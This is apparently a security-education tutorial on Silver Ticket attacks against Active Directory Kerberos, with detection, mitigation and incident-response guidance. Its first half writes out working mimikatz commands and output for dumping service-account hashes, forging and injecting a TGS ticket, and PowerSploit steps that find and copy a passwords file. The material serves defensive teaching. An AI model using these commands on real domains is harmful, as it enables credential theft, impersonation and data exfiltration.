Silver Ticket Attack

Attack Tutorial: How a Silver Ticket Attack Works

STEP 1

Compromise the credentials of a service account

To gain the ability to mint TGS tickets, an adversary must first compromise the password hash of a service account. In this example, an adversary who has compromised a file server now compromises the password hash of a service account:

      PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

mimikatz(commandline) # privilege::debug

Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

# ... output truncated ... #

Authentication Id : 0 ; 29151002 (00000000:01bccf1a)

Session : Interactive from 5

User Name : DWM-5

Domain : Window Manager

Logon Server : (null)

Logon Time : 21/07/2020 10:26:16

SID : S-1-5-90-0-5

msv :

[00000003] Primary

* Username : FileServer1$

* Domain : DOMAIN

* NTLM : 281fd98680ed31a9212256ada413db50

* SHA1 : c8fe518dfa728eb92eb2566328f0123e3bcb2717

# ... output truncated ... #

mimikatz(commandline) # exit

Bye!
      

STEP 2

Forge Kerberos TGS tickets

Tools like mimikatz can be used to mint Silver Tickets. The process for forging TGS tickets is similar to minting Golden Tickets, and with mimikatz uses the same kerberos::golden method, specifying the password hash of the service account instead of the krbtgt, along with the following parameters:

• /domain — The fully qualified domain name of the Active Directory domain
• /sid — The SID of the Active Directory domain
• /user — The username to impersonate
• /target — The fully qualified domain name of the server
• /service — The target service name
• /rc4 — The NTLM/RC4 password hash

      PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit

mimikatz(commandline) # kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt

User : NonExistentUser

Domain : domain.com (DOMAIN)

SID : S-1-5-21-5840559-2756745051-1363507867

User Id : 500

Groups Id : *513 512 520 518 519

ServiceKey: 8fbe632c51039f92c21bcef456b31f2b - rc4_hmac_nt

Service : cifs

Target : FileServer1.domain.com

Lifetime : 27/07/2020 12:20:26 ; 25/07/2030 12:20:26 ; 25/07/2030 12:20:26

-> Ticket : ** Pass The Ticket **

* PAC generated

* PAC signed

* EncTicketPart generated

* EncTicketPart encrypted

* KrbCred generated

Golden ticket for 'NonExistentUser @ domain.com' successfully submitted for current session

mimikatz(commandline) # misc::cmd

Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7767043B8

mimikatz(commandline) # exit

Bye!
      

STEP 3

Use the forged tickets to gain further objectives

In the previous step, the adversary forged a silver ticket and injected it into a new cmd.exe session. The Silver Ticket the attacker minted specified the cifs service, which will allow the attacker to use the forged TGS to access file shares. Because the TGS is forged, it can be created for a user that does not actually exist in the domain, making it harder for responders to track the adversary.In this example, the adversary uses the forged ticket and the Find-InterestingFile cmdlet from the PowerShell module PowerSploit to scan the file share for sensitive data and exfiltrate it.

      PS> Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\

FullName : \\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx

Owner : DOMAIN\JOED

LastAccessTime : 27/07/2020 12:47:44

LastWriteTime : 27/07/2020 12:47:44

CreationTime : 10/04/2011 10:04:50

Length : 76859

PS> Copy-Item -Path "\\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx" -Destination "C:\Windows\Temp\a20ds3"

PS>
      

Detect, Mitigate and Respond

Detect

Difficulty: Hard

The normal process of obtaining a ticket-granting service ticket involves asking a domain controller to generate one. After the caller proves their identity, the domain controller will reply with a TGS encrypted with the service account password. But because the adversary has compromised that password, they can mint TGS tickets without communicating with the domain controller.Thus, detecting Silver Tickets is possible only on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as:

• Usernames that don’t exist
• Modified (added or removed) group memberships
• Username and ID mismatches
• Weaker than normal encryption types or ticket lifetimes that exceed the domain maximum (the domain default lifetime is 10 hours; the mimikatz default is 10 years)

The Windows event log has several audit events that are useful for detecting Silver Tickets:

Event

Source

Information

Audit Group Membership: Event ID 4627

Member Computers

• User’s security identifier (SID)
• Group memberships

Audit Logon: Event ID 4624

Member Computers

• User’s security identifier (SID)
• Username
• Source IP (indicating potentially compromised host)

Mitigate

Difficulty: Medium

Because Silver Tickets abuse the Kerberos protocol, the risk of their use cannot be entirely eliminated. However, several mitigations exist that can make it harder for an adversary to compromise service account password hashes.

• Adopt strong password hygiene practices for service accounts: Their passwords should be randomly generated, have a minimum of 30 characters and be routinely changed.
• Enable PAC Validation. Though it has known limitations, there are some situations in which it may assist with the detection and prevention of Silver tickets.
• Remove end-user administrative privileges on member workstations, and adopt controlled privilege elevation solutions.
• Reduce administrative access to member workstations and servers to the least required.
• Use solutions like Microsoft LAPS to create strong, random and unique passwords for local administrator accounts, and automatically rotate them periodically.
• Apply the recommended mitigations for Kerberoasting.
• Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller.

Respond

Difficulty: Medium

If a Silver Ticket is detected, the following response actions should be taken:

• Activate the incident response process and alert the incident response team.
• Quarantine any implicated computers for forensic investigation and eradication and recovery activities.
• Reset the password of the compromised service account.